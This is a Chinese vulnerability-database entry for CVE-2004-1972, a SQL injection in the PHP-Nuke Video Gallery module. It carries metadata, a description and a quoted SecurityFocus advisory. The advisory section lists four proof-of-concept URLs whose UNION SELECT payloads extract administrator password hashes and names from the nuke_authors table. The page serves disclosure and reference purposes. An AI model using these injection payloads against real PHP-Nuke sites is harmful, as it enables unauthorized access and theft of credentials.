PHP-Nuke Multiple Video Gallery Module SQL注入漏洞

15次阅读
没有评论

PHP-Nuke Multiple Video Gallery Module SQL注入漏洞

漏洞ID 1107909 漏洞类型 SQL注入
发布时间 2004-04-26 更新时间 2005-10-20
PHP-Nuke Multiple Video Gallery Module SQL注入漏洞CVE编号 CVE-2004-1972
PHP-Nuke Multiple Video Gallery Module SQL注入漏洞CNNVD-ID CNNVD-200404-095
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/24060
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200404-095
|漏洞详情
PHP-NukeVideoGalleryModule0.1Beta5版本中的modules.php存在SQL注入漏洞。远程攻击者可以通过在viewclip,viewcat,或voteclip行动中的(1)clipid或(2)catid参数来执行任意SQL代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/10215/info

Reportedly the PHP-Nuke Video Gallery module is affected by multiple SQL injection vulnerabilities. This is due to a failure of the application to properly sanitize user-supplied input prior to using it in an SQL query.

These issues may allow a remote attacker to manipulate query logic, potentially leading to unauthorized access to sensitive information such as the administrator password hash or corruption of database data. SQL injection attacks may also potentially be used to exploit latent vulnerabilities in the underlying database implementation.

http://www.example.com/modules.php?name=Video_Gallery&l_op=viewclip&clipid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors&catid=1
http://www.example.com/modules.php?name=Video_Gallery&l_op=viewcat&catid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors
http://www.example.com/modules.php?name=Video_Gallery&l_op=viewclip&clipid=-1%20UNION%20SELECT%20name%20FROM%20nuke_authors&catid=1
http://www.example.com/modules.php?name=Video_Gallery&l_op=voteclip&clipid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors&catid=1
|参考资料

来源:XF
名称:video-gallery-sql-injection(15979)
链接:http://xforce.iss.net/xforce/xfdb/15979
来源:BID
名称:10215
链接:http://www.securityfocus.com/bid/10215
来源:BUGTRAQ
名称:20040426MultiplevulnerabilitiesPHP-NukeVideoGalleryModuleforPHP-Nuke
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=108308660628557&w;=2

相关推荐: Dune 0.6.7 – GET Remote Buffer Overrun

Dune 0.6.7 – GET Remote Buffer Overrun 漏洞ID 1053969 漏洞类型 发布时间 2003-06-17 更新时间 2003-06-17 CVE编号 N/A CNNVD-ID N/A 漏洞平台 Linux CVSS评分 …

正文完
 0